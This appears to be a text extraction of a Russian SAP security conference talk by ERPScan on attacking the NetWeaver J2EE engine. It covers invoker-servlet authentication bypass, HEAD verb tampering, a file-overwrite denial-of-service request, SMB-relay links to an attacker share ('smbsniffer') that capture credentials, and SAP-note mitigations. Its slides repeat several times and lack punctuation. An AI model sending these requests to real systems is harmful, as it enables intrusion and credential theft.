ltservletgt ltservlet-namegtCriticalActionltservlet-namegt ltservlet-classgtcomsapadminCriticalActionltservlet-classgt ltservletgtltservlet-mappinggt ltservlet-namegtCriticalActionltltservlet-namegt lturl-patterngtadmincriticallturl-patterngt ltservlet-mappinggtltsecurity-constraintgtltweb-resource-collectiongtltweb-resource-namegtRestrictedaccessltweb-resource-namegtlturl-patterngtadminlturl-patterngtlthttp-methodgtGETlthttp-methodgtltweb-resource-collectiongtltauth-constraintgt ltrole-namegtadminltrole-namegt ltauth-constraintgtltsecurity-constraintgt
Обход аутентификации Invoker Servlet
erpscancom 51ERPScan mdash invest in security to secure investments
bull Можно вызвать любой сервлет напрямую по имени классаbull Пример вызова - servletcomsapadminCriticalAction
bull Порядка 30 приложений из 150 уязвимо (SAP ECC 6)
Защита
erpscancom 52ERPScan mdash invest in security to secure investments
bull Параметр ldquoEnableInvokerServletGloballyrdquo установить в ldquofalserdquo bull Для включения опции только для конкретных приложений - note 1445998bull Для SAP NetWeaver Portal ndash note 1467771bull Для поиска потенциальных уязвимостей в собственных приложениях - ERPScan webxml scanner manually
Массовый взлом
bull
erpscancom 53ERPScan mdash invest in security to secure investments
I have a dream helliphellip
Уязвимость Verb Tampering
erpscancom 54ERPScan mdash invest in security to secure investments
А что если попробовать HEAD вместо GET
ltsecurity-constraintgtltweb-resource-collectiongtltweb-resource-namegtRestrictedaccessltweb-resource-namegtlturl-patterngtadminlturl-patterngtlthttp-methodgtGETlthttp-methodgtltweb-resource-collectiongt ltauth-constraintgt ltrole-namegtadminltrole-namegt ltauth-constraintgtltsecurity-constraintgt
Отказ в обслуживании
Приложение Integration Directory
HEAD dirsupportCheckServicecmd_checkampfileNameL=DEFAULT1PFLamp directoryNameL=DusrsapDM0SYSprofile HTTP10
erpscancom 55ERPScan mdash invest in security to secure investments
Любой злоумышленник может с помощью одного запроса перезаписать любой файл на системе удалённо из сети
интернет
Получение доступа к ОС
Приложение Integration Directory
HEAD dirsupportCheckServicecmd_checkampfileNameL=DEFAULT1PFLamp directoryNameL= smbsniffersniff HTTP10
erpscancom 56ERPScan mdash invest in security to secure investments
Любой злоумышленник может с помощью одного запроса получить административный доступ к SAP серверу под
управлением Windows
Полный контроль
bull Обнаружили секретный интерфейс для управления JAVA движкомndash Удалённое администрирование пользователейndash Доступ к ОСndash Выполнение произвольных командndash Выключение сервера
bull Установлен по умолчаниюbull Уязвим к Verb Tamperingbull Атака возможна без аутентификации из Интернет
erpscancom 57ERPScan mdash invest in security to secure investments
Взломать SAP за 60 секунд
ДЕМООООООООООООО
erpscancom 58ERPScan mdash invest in security to secure investments
Победа
erpscancom 59ERPScan mdash invest in security to secure investments
Защита
erpscancom 60ERPScan mdash invest in security to secure investments
bull SAP note 1503579 1616259bull ERPScan WEBXML check toolbull Отключение ненужных сервисов
Итоги
Проблема ответственности и контроля
erpscancom 61ERPScan mdash invest in security to secure investments
Будущая работа
Конференцииbull 11 October - HITB в Кула-Лумпуре (Малайзия)bull 25 October - HackerHalted в Miami (США)bull 25 November ndash ZeroNights в Санкт-Петербурге (Россия)
Новостиbull dsecrgru bull erpscanru
Cпасибоbull Дмитрий Частухин Дмитрий Евдокимов Алексей Cинцов Алексей Тюрин Павел
Кузьмин Антон Спирин bull Организаторам Risspa
Опросbull Тренинг по безопасности SAP
erpscancom 62ERPScan mdash invest in security to secure investments
ZeroNights mdash международная конференция посвященная техническим аспектам информационной безопасности На конференции выступят известные эксперты отрасли из России Европы США Индии Сингапура и других стран Главная цель конференции mdash распространение информации о новых методах атак угроз и защиты от них а кроме того создание площадки для общения специалистов-практиков по ИБ
- Взломать SAP за 60 cекунд Александр Поляков Технический Дирек
- я
- Доклады о безопасности SAP
- Количество SAP notes за год
- Публичная информация об уязвимостях
- SAP не дремлет
- Поговорим о безопасности
- Что мы знаем о SAP
- SAP Who cares
- Постоянные новые угрозы
- Как атакуют
- Последний год
- Угрозы для бизнеса
- Как защищаемся
- Что происходит сейчас
- Slide 16
- 1001 Способ обойти SOD
- Не диалоговые пользователи
- Атаки на Gateway и Message Server
- Хитрые настройки
- Прямой доступ к таблицам
- Доступ из интернет + уязвимости
- Атаки на ICM (ABAP)
- Прочие небезопасные сервисы
- Атаки на J2EE Engine
- J2EE Platform Architecture
- Удалённый доступ
- Уязвимый алгоритм шифрования паролей в P4
- Уязвимый алгоритм шифрования паролей в P4 (2)
- Уязвимый алгоритм шифрования паролей в P4 (3)
- Уязвимый алгоритм шифрования паролей в P4 (4)
- Защита
- Взлом из интернет
- Из чего состоит J2EE Engine
- Из чего состоит J2EE Engine (2)
- Из чего состоит J2EE Engine (3)
- Из чего состоит J2EE Engine (4)
- Раскрытие информации
- Раскрытие информации DSECRG-11-023
- Раскрытие информации DSECRG-11-027
- Раскрытие информации DSECRG-11-032
- Раскрытие информации DSECRG-00231
- Защита (2)
- Межсайтовый скриптинг
- SMBRelay
- CSRF + SmbRelay = CSSR
- Защита от CSRF
- SPML
- Аутентификация
- Декларативная аутентификация
- Обход аутентификации Invoker Servlet
- Защита (3)
- Массовый взлом
- Уязвимость Verb Tampering
- Отказ в обслуживании
- Получение доступа к ОС
- Полный контроль
- Взломать SAP за 60 секунд
- Победа
- Защита (4)
- Итоги
- Будущая работа
- Slide 63
-
Раскрытие информации DSECRG-11-032
erpscancom 41ERPScan mdash invest in security to secure investments
Host is not alive
Port closed
HTTP port
SAP port
Раскрытие информации DSECRG-00231
erpscancom 42ERPScan mdash invest in security to secure investments
Защита
erpscancom 43ERPScan mdash invest in security to secure investments
bull SAP notes154854815458831503856948851 1545883
bull Удаление ненужных и не поддерживаемых приложений
Межсайтовый скриптинг
erpscancom 44ERPScan mdash invest in security to secure investments
15092011 [DSECRG-11-033] SAP Crystal Report Server pubDBLogon - Linked ХSS vulnerability
19082011 [DSECRG-11-030] SAP NetWeaver JavaMailExamples - XSS
19072011 [DSECRG-11-028] SAP NetWeaver ISpeak ndash XSS
20062011 [DSECRG-11-024 ] SAP NetWeaver performance Provier Root - XSS20062011 [DSECRG-11-025 ] SAP NetWeaver Trust Center Service - XSS12042011 [DSECRG-11-016] SAP NetWeaver Data Archiving Service - multiple XSS12042011 [DSECRG-11-015] SAP NetWeaver MessagingServer - XSS14032011 [DSECRG-11-013] SAP NetWeaver Runtime - multiple XSS14032011 [DSECRG-11-012] SAP NetWeaver Integration Directory - multiple XSS14032011 [DSECRG-11-011] SAP Crystal Reports 2008 - Multiple XSS14032011 [DSECRG-11-010] SAP NetWeaver logonhtml - XSS14032011 [DSECRG-11-009] SAP NetWeaver XI SOAP Adapter - XSS
14122010 [DSECRG-09-067] SAP NetWeaver DTR - Multiple XSS14122010 [DSECRG-10-009] SAP NetWeaver ExchangeProfile - XSS14122010 [DSECRG-10-008] SAP NetWaver JPR Proxy Server - Multiple XSS14122010 [DSECRG-10-007] SAP NetWeaver Component Build Service - XSS11112010 [DSECRG-09-056] SAP Netweaver SQL Monitors - Multiple XSS
И это только те что закрыты
SMBRelay
erpscancom 45ERPScan mdash invest in security to secure investments
httpserverportmmrMMRfilename=smbsnifferanyfile
CSRF + SmbRelay = CSSR
erpscancom 46ERPScan mdash invest in security to secure investments
httpserverportmmrMMRfilename=smbsnifferanyfile
Заставь нажать на эту ссылку того у кого есть к ней доступ
Защита от CSRF
erpscancom 47ERPScan mdash invest in security to secure investments
Встроенное API для защиты от CSRF
bull Standard XSRF Protection Вся работа реализуется сервером приложений (простые GETPOST)
bull Custom CSRF Protection Обработка CSRF токенов на разработчике
Есть множество мест где эта защита не реализована
SPML
erpscancom 48ERPScan mdash invest in security to secure investments
Аутентификация
erpscancom 49ERPScan mdash invest in security to secure investments
Web Dynpro - programmatic Portal iViews - programmatic J2EE Web apps - declarative или programmatic
Programmatic Используя UME
Declarative Используя WEBXML
Декларативная аутентификация
erpscancom 50ERPScan mdash invest in security to secure investments
ltservletgt ltservlet-namegtCriticalActionltservlet-namegt ltservlet-classgtcomsapadminCriticalActionltservlet-classgt ltservletgtltservlet-mappinggt ltservlet-namegtCriticalActionltltservlet-namegt lturl-patterngtadmincriticallturl-patterngt ltservlet-mappinggtltsecurity-constraintgtltweb-resource-collectiongtltweb-resource-namegtRestrictedaccessltweb-resource-namegtlturl-patterngtadminlturl-patterngtlthttp-methodgtGETlthttp-methodgtltweb-resource-collectiongtltauth-constraintgt ltrole-namegtadminltrole-namegt ltauth-constraintgtltsecurity-constraintgt
Обход аутентификации Invoker Servlet
erpscancom 51ERPScan mdash invest in security to secure investments
bull Можно вызвать любой сервлет напрямую по имени классаbull Пример вызова - servletcomsapadminCriticalAction
bull Порядка 30 приложений из 150 уязвимо (SAP ECC 6)
Защита
erpscancom 52ERPScan mdash invest in security to secure investments
bull Параметр ldquoEnableInvokerServletGloballyrdquo установить в ldquofalserdquo bull Для включения опции только для конкретных приложений - note 1445998bull Для SAP NetWeaver Portal ndash note 1467771bull Для поиска потенциальных уязвимостей в собственных приложениях - ERPScan webxml scanner manually
Массовый взлом
bull
erpscancom 53ERPScan mdash invest in security to secure investments
I have a dream helliphellip
Уязвимость Verb Tampering
erpscancom 54ERPScan mdash invest in security to secure investments
А что если попробовать HEAD вместо GET
ltsecurity-constraintgtltweb-resource-collectiongtltweb-resource-namegtRestrictedaccessltweb-resource-namegtlturl-patterngtadminlturl-patterngtlthttp-methodgtGETlthttp-methodgtltweb-resource-collectiongt ltauth-constraintgt ltrole-namegtadminltrole-namegt ltauth-constraintgtltsecurity-constraintgt
Отказ в обслуживании
Приложение Integration Directory
HEAD dirsupportCheckServicecmd_checkampfileNameL=DEFAULT1PFLamp directoryNameL=DusrsapDM0SYSprofile HTTP10
erpscancom 55ERPScan mdash invest in security to secure investments
Любой злоумышленник может с помощью одного запроса перезаписать любой файл на системе удалённо из сети
интернет
Получение доступа к ОС
Приложение Integration Directory
HEAD dirsupportCheckServicecmd_checkampfileNameL=DEFAULT1PFLamp directoryNameL= smbsniffersniff HTTP10
erpscancom 56ERPScan mdash invest in security to secure investments
Любой злоумышленник может с помощью одного запроса получить административный доступ к SAP серверу под
управлением Windows
Полный контроль
bull Обнаружили секретный интерфейс для управления JAVA движкомndash Удалённое администрирование пользователейndash Доступ к ОСndash Выполнение произвольных командndash Выключение сервера
bull Установлен по умолчаниюbull Уязвим к Verb Tamperingbull Атака возможна без аутентификации из Интернет
erpscancom 57ERPScan mdash invest in security to secure investments
Взломать SAP за 60 секунд
ДЕМООООООООООООО
erpscancom 58ERPScan mdash invest in security to secure investments
Победа
erpscancom 59ERPScan mdash invest in security to secure investments
Защита
erpscancom 60ERPScan mdash invest in security to secure investments
bull SAP note 1503579 1616259bull ERPScan WEBXML check toolbull Отключение ненужных сервисов
Итоги
Проблема ответственности и контроля
erpscancom 61ERPScan mdash invest in security to secure investments
Будущая работа
Конференцииbull 11 October - HITB в Кула-Лумпуре (Малайзия)bull 25 October - HackerHalted в Miami (США)bull 25 November ndash ZeroNights в Санкт-Петербурге (Россия)
Новостиbull dsecrgru bull erpscanru
Cпасибоbull Дмитрий Частухин Дмитрий Евдокимов Алексей Cинцов Алексей Тюрин Павел
Кузьмин Антон Спирин bull Организаторам Risspa
Опросbull Тренинг по безопасности SAP
erpscancom 62ERPScan mdash invest in security to secure investments
ZeroNights mdash международная конференция посвященная техническим аспектам информационной безопасности На конференции выступят известные эксперты отрасли из России Европы США Индии Сингапура и других стран Главная цель конференции mdash распространение информации о новых методах атак угроз и защиты от них а кроме того создание площадки для общения специалистов-практиков по ИБ
- Взломать SAP за 60 cекунд Александр Поляков Технический Дирек
- я
- Доклады о безопасности SAP
- Количество SAP notes за год
- Публичная информация об уязвимостях
- SAP не дремлет
- Поговорим о безопасности
- Что мы знаем о SAP
- SAP Who cares
- Постоянные новые угрозы
- Как атакуют
- Последний год
- Угрозы для бизнеса
- Как защищаемся
- Что происходит сейчас
- Slide 16
- 1001 Способ обойти SOD
- Не диалоговые пользователи
- Атаки на Gateway и Message Server
- Хитрые настройки
- Прямой доступ к таблицам
- Доступ из интернет + уязвимости
- Атаки на ICM (ABAP)
- Прочие небезопасные сервисы
- Атаки на J2EE Engine
- J2EE Platform Architecture
- Удалённый доступ
- Уязвимый алгоритм шифрования паролей в P4
- Уязвимый алгоритм шифрования паролей в P4 (2)
- Уязвимый алгоритм шифрования паролей в P4 (3)
- Уязвимый алгоритм шифрования паролей в P4 (4)
- Защита
- Взлом из интернет
- Из чего состоит J2EE Engine
- Из чего состоит J2EE Engine (2)
- Из чего состоит J2EE Engine (3)
- Из чего состоит J2EE Engine (4)
- Раскрытие информации
- Раскрытие информации DSECRG-11-023
- Раскрытие информации DSECRG-11-027
- Раскрытие информации DSECRG-11-032
- Раскрытие информации DSECRG-00231
- Защита (2)
- Межсайтовый скриптинг
- SMBRelay
- CSRF + SmbRelay = CSSR
- Защита от CSRF
- SPML
- Аутентификация
- Декларативная аутентификация
- Обход аутентификации Invoker Servlet
- Защита (3)
- Массовый взлом
- Уязвимость Verb Tampering
- Отказ в обслуживании
- Получение доступа к ОС
- Полный контроль
- Взломать SAP за 60 секунд
- Победа
- Защита (4)
- Итоги
- Будущая работа
- Slide 63
-
Раскрытие информации DSECRG-00231
erpscancom 42ERPScan mdash invest in security to secure investments
Защита
erpscancom 43ERPScan mdash invest in security to secure investments
bull SAP notes154854815458831503856948851 1545883
bull Удаление ненужных и не поддерживаемых приложений
Межсайтовый скриптинг
erpscancom 44ERPScan mdash invest in security to secure investments
15092011 [DSECRG-11-033] SAP Crystal Report Server pubDBLogon - Linked ХSS vulnerability
19082011 [DSECRG-11-030] SAP NetWeaver JavaMailExamples - XSS
19072011 [DSECRG-11-028] SAP NetWeaver ISpeak ndash XSS
20062011 [DSECRG-11-024 ] SAP NetWeaver performance Provier Root - XSS20062011 [DSECRG-11-025 ] SAP NetWeaver Trust Center Service - XSS12042011 [DSECRG-11-016] SAP NetWeaver Data Archiving Service - multiple XSS12042011 [DSECRG-11-015] SAP NetWeaver MessagingServer - XSS14032011 [DSECRG-11-013] SAP NetWeaver Runtime - multiple XSS14032011 [DSECRG-11-012] SAP NetWeaver Integration Directory - multiple XSS14032011 [DSECRG-11-011] SAP Crystal Reports 2008 - Multiple XSS14032011 [DSECRG-11-010] SAP NetWeaver logonhtml - XSS14032011 [DSECRG-11-009] SAP NetWeaver XI SOAP Adapter - XSS
14122010 [DSECRG-09-067] SAP NetWeaver DTR - Multiple XSS14122010 [DSECRG-10-009] SAP NetWeaver ExchangeProfile - XSS14122010 [DSECRG-10-008] SAP NetWaver JPR Proxy Server - Multiple XSS14122010 [DSECRG-10-007] SAP NetWeaver Component Build Service - XSS11112010 [DSECRG-09-056] SAP Netweaver SQL Monitors - Multiple XSS
И это только те что закрыты
SMBRelay
erpscancom 45ERPScan mdash invest in security to secure investments
httpserverportmmrMMRfilename=smbsnifferanyfile
CSRF + SmbRelay = CSSR
erpscancom 46ERPScan mdash invest in security to secure investments
httpserverportmmrMMRfilename=smbsnifferanyfile
Заставь нажать на эту ссылку того у кого есть к ней доступ
Защита от CSRF
erpscancom 47ERPScan mdash invest in security to secure investments
Встроенное API для защиты от CSRF
bull Standard XSRF Protection Вся работа реализуется сервером приложений (простые GETPOST)
bull Custom CSRF Protection Обработка CSRF токенов на разработчике
Есть множество мест где эта защита не реализована
SPML
erpscancom 48ERPScan mdash invest in security to secure investments
Аутентификация
erpscancom 49ERPScan mdash invest in security to secure investments
Web Dynpro - programmatic Portal iViews - programmatic J2EE Web apps - declarative или programmatic
Programmatic Используя UME
Declarative Используя WEBXML
Декларативная аутентификация
erpscancom 50ERPScan mdash invest in security to secure investments
ltservletgt ltservlet-namegtCriticalActionltservlet-namegt ltservlet-classgtcomsapadminCriticalActionltservlet-classgt ltservletgtltservlet-mappinggt ltservlet-namegtCriticalActionltltservlet-namegt lturl-patterngtadmincriticallturl-patterngt ltservlet-mappinggtltsecurity-constraintgtltweb-resource-collectiongtltweb-resource-namegtRestrictedaccessltweb-resource-namegtlturl-patterngtadminlturl-patterngtlthttp-methodgtGETlthttp-methodgtltweb-resource-collectiongtltauth-constraintgt ltrole-namegtadminltrole-namegt ltauth-constraintgtltsecurity-constraintgt
Обход аутентификации Invoker Servlet
erpscancom 51ERPScan mdash invest in security to secure investments
bull Можно вызвать любой сервлет напрямую по имени классаbull Пример вызова - servletcomsapadminCriticalAction
bull Порядка 30 приложений из 150 уязвимо (SAP ECC 6)
Защита
erpscancom 52ERPScan mdash invest in security to secure investments
bull Параметр ldquoEnableInvokerServletGloballyrdquo установить в ldquofalserdquo bull Для включения опции только для конкретных приложений - note 1445998bull Для SAP NetWeaver Portal ndash note 1467771bull Для поиска потенциальных уязвимостей в собственных приложениях - ERPScan webxml scanner manually
Массовый взлом
bull
erpscancom 53ERPScan mdash invest in security to secure investments
I have a dream helliphellip
Уязвимость Verb Tampering
erpscancom 54ERPScan mdash invest in security to secure investments
А что если попробовать HEAD вместо GET
ltsecurity-constraintgtltweb-resource-collectiongtltweb-resource-namegtRestrictedaccessltweb-resource-namegtlturl-patterngtadminlturl-patterngtlthttp-methodgtGETlthttp-methodgtltweb-resource-collectiongt ltauth-constraintgt ltrole-namegtadminltrole-namegt ltauth-constraintgtltsecurity-constraintgt
Отказ в обслуживании
Приложение Integration Directory
HEAD dirsupportCheckServicecmd_checkampfileNameL=DEFAULT1PFLamp directoryNameL=DusrsapDM0SYSprofile HTTP10
erpscancom 55ERPScan mdash invest in security to secure investments
Любой злоумышленник может с помощью одного запроса перезаписать любой файл на системе удалённо из сети
интернет
Получение доступа к ОС
Приложение Integration Directory
HEAD dirsupportCheckServicecmd_checkampfileNameL=DEFAULT1PFLamp directoryNameL= smbsniffersniff HTTP10
erpscancom 56ERPScan mdash invest in security to secure investments
Любой злоумышленник может с помощью одного запроса получить административный доступ к SAP серверу под
управлением Windows
Полный контроль
bull Обнаружили секретный интерфейс для управления JAVA движкомndash Удалённое администрирование пользователейndash Доступ к ОСndash Выполнение произвольных командndash Выключение сервера
bull Установлен по умолчаниюbull Уязвим к Verb Tamperingbull Атака возможна без аутентификации из Интернет
erpscancom 57ERPScan mdash invest in security to secure investments
Взломать SAP за 60 секунд
ДЕМООООООООООООО
erpscancom 58ERPScan mdash invest in security to secure investments
Победа
erpscancom 59ERPScan mdash invest in security to secure investments
Защита
erpscancom 60ERPScan mdash invest in security to secure investments
bull SAP note 1503579 1616259bull ERPScan WEBXML check toolbull Отключение ненужных сервисов
Итоги
Проблема ответственности и контроля
erpscancom 61ERPScan mdash invest in security to secure investments
Будущая работа
Конференцииbull 11 October - HITB в Кула-Лумпуре (Малайзия)bull 25 October - HackerHalted в Miami (США)bull 25 November ndash ZeroNights в Санкт-Петербурге (Россия)
Новостиbull dsecrgru bull erpscanru
Cпасибоbull Дмитрий Частухин Дмитрий Евдокимов Алексей Cинцов Алексей Тюрин Павел
Кузьмин Антон Спирин bull Организаторам Risspa
Опросbull Тренинг по безопасности SAP
erpscancom 62ERPScan mdash invest in security to secure investments
ZeroNights mdash международная конференция посвященная техническим аспектам информационной безопасности На конференции выступят известные эксперты отрасли из России Европы США Индии Сингапура и других стран Главная цель конференции mdash распространение информации о новых методах атак угроз и защиты от них а кроме того создание площадки для общения специалистов-практиков по ИБ
- Взломать SAP за 60 cекунд Александр Поляков Технический Дирек
- я
- Доклады о безопасности SAP
- Количество SAP notes за год
- Публичная информация об уязвимостях
- SAP не дремлет
- Поговорим о безопасности
- Что мы знаем о SAP
- SAP Who cares
- Постоянные новые угрозы
- Как атакуют
- Последний год
- Угрозы для бизнеса
- Как защищаемся
- Что происходит сейчас
- Slide 16
- 1001 Способ обойти SOD
- Не диалоговые пользователи
- Атаки на Gateway и Message Server
- Хитрые настройки
- Прямой доступ к таблицам
- Доступ из интернет + уязвимости
- Атаки на ICM (ABAP)
- Прочие небезопасные сервисы
- Атаки на J2EE Engine
- J2EE Platform Architecture
- Удалённый доступ
- Уязвимый алгоритм шифрования паролей в P4
- Уязвимый алгоритм шифрования паролей в P4 (2)
- Уязвимый алгоритм шифрования паролей в P4 (3)
- Уязвимый алгоритм шифрования паролей в P4 (4)
- Защита
- Взлом из интернет
- Из чего состоит J2EE Engine
- Из чего состоит J2EE Engine (2)
- Из чего состоит J2EE Engine (3)
- Из чего состоит J2EE Engine (4)
- Раскрытие информации
- Раскрытие информации DSECRG-11-023
- Раскрытие информации DSECRG-11-027
- Раскрытие информации DSECRG-11-032
- Раскрытие информации DSECRG-00231
- Защита (2)
- Межсайтовый скриптинг
- SMBRelay
- CSRF + SmbRelay = CSSR
- Защита от CSRF
- SPML
- Аутентификация
- Декларативная аутентификация
- Обход аутентификации Invoker Servlet
- Защита (3)
- Массовый взлом
- Уязвимость Verb Tampering
- Отказ в обслуживании
- Получение доступа к ОС
- Полный контроль
- Взломать SAP за 60 секунд
- Победа
- Защита (4)
- Итоги
- Будущая работа
- Slide 63
-
Защита
erpscancom 43ERPScan mdash invest in security to secure investments
bull SAP notes154854815458831503856948851 1545883
bull Удаление ненужных и не поддерживаемых приложений
Межсайтовый скриптинг
erpscancom 44ERPScan mdash invest in security to secure investments
15092011 [DSECRG-11-033] SAP Crystal Report Server pubDBLogon - Linked ХSS vulnerability
19082011 [DSECRG-11-030] SAP NetWeaver JavaMailExamples - XSS
19072011 [DSECRG-11-028] SAP NetWeaver ISpeak ndash XSS
20062011 [DSECRG-11-024 ] SAP NetWeaver performance Provier Root - XSS20062011 [DSECRG-11-025 ] SAP NetWeaver Trust Center Service - XSS12042011 [DSECRG-11-016] SAP NetWeaver Data Archiving Service - multiple XSS12042011 [DSECRG-11-015] SAP NetWeaver MessagingServer - XSS14032011 [DSECRG-11-013] SAP NetWeaver Runtime - multiple XSS14032011 [DSECRG-11-012] SAP NetWeaver Integration Directory - multiple XSS14032011 [DSECRG-11-011] SAP Crystal Reports 2008 - Multiple XSS14032011 [DSECRG-11-010] SAP NetWeaver logonhtml - XSS14032011 [DSECRG-11-009] SAP NetWeaver XI SOAP Adapter - XSS
14122010 [DSECRG-09-067] SAP NetWeaver DTR - Multiple XSS14122010 [DSECRG-10-009] SAP NetWeaver ExchangeProfile - XSS14122010 [DSECRG-10-008] SAP NetWaver JPR Proxy Server - Multiple XSS14122010 [DSECRG-10-007] SAP NetWeaver Component Build Service - XSS11112010 [DSECRG-09-056] SAP Netweaver SQL Monitors - Multiple XSS
И это только те что закрыты
SMBRelay
erpscancom 45ERPScan mdash invest in security to secure investments
httpserverportmmrMMRfilename=smbsnifferanyfile
CSRF + SmbRelay = CSSR
erpscancom 46ERPScan mdash invest in security to secure investments
httpserverportmmrMMRfilename=smbsnifferanyfile
Заставь нажать на эту ссылку того у кого есть к ней доступ
Защита от CSRF
erpscancom 47ERPScan mdash invest in security to secure investments
Встроенное API для защиты от CSRF
bull Standard XSRF Protection Вся работа реализуется сервером приложений (простые GETPOST)
bull Custom CSRF Protection Обработка CSRF токенов на разработчике
Есть множество мест где эта защита не реализована
SPML
erpscancom 48ERPScan mdash invest in security to secure investments
Аутентификация
erpscancom 49ERPScan mdash invest in security to secure investments
Web Dynpro - programmatic Portal iViews - programmatic J2EE Web apps - declarative или programmatic
Programmatic Используя UME
Declarative Используя WEBXML
Декларативная аутентификация
erpscancom 50ERPScan mdash invest in security to secure investments
ltservletgt ltservlet-namegtCriticalActionltservlet-namegt ltservlet-classgtcomsapadminCriticalActionltservlet-classgt ltservletgtltservlet-mappinggt ltservlet-namegtCriticalActionltltservlet-namegt lturl-patterngtadmincriticallturl-patterngt ltservlet-mappinggtltsecurity-constraintgtltweb-resource-collectiongtltweb-resource-namegtRestrictedaccessltweb-resource-namegtlturl-patterngtadminlturl-patterngtlthttp-methodgtGETlthttp-methodgtltweb-resource-collectiongtltauth-constraintgt ltrole-namegtadminltrole-namegt ltauth-constraintgtltsecurity-constraintgt
Обход аутентификации Invoker Servlet
erpscancom 51ERPScan mdash invest in security to secure investments
bull Можно вызвать любой сервлет напрямую по имени классаbull Пример вызова - servletcomsapadminCriticalAction
bull Порядка 30 приложений из 150 уязвимо (SAP ECC 6)
Защита
erpscancom 52ERPScan mdash invest in security to secure investments
bull Параметр ldquoEnableInvokerServletGloballyrdquo установить в ldquofalserdquo bull Для включения опции только для конкретных приложений - note 1445998bull Для SAP NetWeaver Portal ndash note 1467771bull Для поиска потенциальных уязвимостей в собственных приложениях - ERPScan webxml scanner manually
Массовый взлом
bull
erpscancom 53ERPScan mdash invest in security to secure investments
I have a dream helliphellip
Уязвимость Verb Tampering
erpscancom 54ERPScan mdash invest in security to secure investments
А что если попробовать HEAD вместо GET
ltsecurity-constraintgtltweb-resource-collectiongtltweb-resource-namegtRestrictedaccessltweb-resource-namegtlturl-patterngtadminlturl-patterngtlthttp-methodgtGETlthttp-methodgtltweb-resource-collectiongt ltauth-constraintgt ltrole-namegtadminltrole-namegt ltauth-constraintgtltsecurity-constraintgt
Отказ в обслуживании
Приложение Integration Directory
HEAD dirsupportCheckServicecmd_checkampfileNameL=DEFAULT1PFLamp directoryNameL=DusrsapDM0SYSprofile HTTP10
erpscancom 55ERPScan mdash invest in security to secure investments
Любой злоумышленник может с помощью одного запроса перезаписать любой файл на системе удалённо из сети
интернет
Получение доступа к ОС
Приложение Integration Directory
HEAD dirsupportCheckServicecmd_checkampfileNameL=DEFAULT1PFLamp directoryNameL= smbsniffersniff HTTP10
erpscancom 56ERPScan mdash invest in security to secure investments
Любой злоумышленник может с помощью одного запроса получить административный доступ к SAP серверу под
управлением Windows
Полный контроль
bull Обнаружили секретный интерфейс для управления JAVA движкомndash Удалённое администрирование пользователейndash Доступ к ОСndash Выполнение произвольных командndash Выключение сервера
bull Установлен по умолчаниюbull Уязвим к Verb Tamperingbull Атака возможна без аутентификации из Интернет
erpscancom 57ERPScan mdash invest in security to secure investments
Взломать SAP за 60 секунд
ДЕМООООООООООООО
erpscancom 58ERPScan mdash invest in security to secure investments
Победа
erpscancom 59ERPScan mdash invest in security to secure investments
Защита
erpscancom 60ERPScan mdash invest in security to secure investments
bull SAP note 1503579 1616259bull ERPScan WEBXML check toolbull Отключение ненужных сервисов
Итоги
Проблема ответственности и контроля
erpscancom 61ERPScan mdash invest in security to secure investments
Будущая работа
Конференцииbull 11 October - HITB в Кула-Лумпуре (Малайзия)bull 25 October - HackerHalted в Miami (США)bull 25 November ndash ZeroNights в Санкт-Петербурге (Россия)
Новостиbull dsecrgru bull erpscanru
Cпасибоbull Дмитрий Частухин Дмитрий Евдокимов Алексей Cинцов Алексей Тюрин Павел
Кузьмин Антон Спирин bull Организаторам Risspa
Опросbull Тренинг по безопасности SAP
erpscancom 62ERPScan mdash invest in security to secure investments
ZeroNights mdash международная конференция посвященная техническим аспектам информационной безопасности На конференции выступят известные эксперты отрасли из России Европы США Индии Сингапура и других стран Главная цель конференции mdash распространение информации о новых методах атак угроз и защиты от них а кроме того создание площадки для общения специалистов-практиков по ИБ
- Взломать SAP за 60 cекунд Александр Поляков Технический Дирек
- я
- Доклады о безопасности SAP
- Количество SAP notes за год
- Публичная информация об уязвимостях
- SAP не дремлет
- Поговорим о безопасности
- Что мы знаем о SAP
- SAP Who cares
- Постоянные новые угрозы
- Как атакуют
- Последний год
- Угрозы для бизнеса
- Как защищаемся
- Что происходит сейчас
- Slide 16
- 1001 Способ обойти SOD
- Не диалоговые пользователи
- Атаки на Gateway и Message Server
- Хитрые настройки
- Прямой доступ к таблицам
- Доступ из интернет + уязвимости
- Атаки на ICM (ABAP)
- Прочие небезопасные сервисы
- Атаки на J2EE Engine
- J2EE Platform Architecture
- Удалённый доступ
- Уязвимый алгоритм шифрования паролей в P4
- Уязвимый алгоритм шифрования паролей в P4 (2)
- Уязвимый алгоритм шифрования паролей в P4 (3)
- Уязвимый алгоритм шифрования паролей в P4 (4)
- Защита
- Взлом из интернет
- Из чего состоит J2EE Engine
- Из чего состоит J2EE Engine (2)
- Из чего состоит J2EE Engine (3)
- Из чего состоит J2EE Engine (4)
- Раскрытие информации
- Раскрытие информации DSECRG-11-023
- Раскрытие информации DSECRG-11-027
- Раскрытие информации DSECRG-11-032
- Раскрытие информации DSECRG-00231
- Защита (2)
- Межсайтовый скриптинг
- SMBRelay
- CSRF + SmbRelay = CSSR
- Защита от CSRF
- SPML
- Аутентификация
- Декларативная аутентификация
- Обход аутентификации Invoker Servlet
- Защита (3)
- Массовый взлом
- Уязвимость Verb Tampering
- Отказ в обслуживании
- Получение доступа к ОС
- Полный контроль
- Взломать SAP за 60 секунд
- Победа
- Защита (4)
- Итоги
- Будущая работа
- Slide 63
-
Межсайтовый скриптинг
erpscancom 44ERPScan mdash invest in security to secure investments
15092011 [DSECRG-11-033] SAP Crystal Report Server pubDBLogon - Linked ХSS vulnerability
19082011 [DSECRG-11-030] SAP NetWeaver JavaMailExamples - XSS
19072011 [DSECRG-11-028] SAP NetWeaver ISpeak ndash XSS
20062011 [DSECRG-11-024 ] SAP NetWeaver performance Provier Root - XSS20062011 [DSECRG-11-025 ] SAP NetWeaver Trust Center Service - XSS12042011 [DSECRG-11-016] SAP NetWeaver Data Archiving Service - multiple XSS12042011 [DSECRG-11-015] SAP NetWeaver MessagingServer - XSS14032011 [DSECRG-11-013] SAP NetWeaver Runtime - multiple XSS14032011 [DSECRG-11-012] SAP NetWeaver Integration Directory - multiple XSS14032011 [DSECRG-11-011] SAP Crystal Reports 2008 - Multiple XSS14032011 [DSECRG-11-010] SAP NetWeaver logonhtml - XSS14032011 [DSECRG-11-009] SAP NetWeaver XI SOAP Adapter - XSS
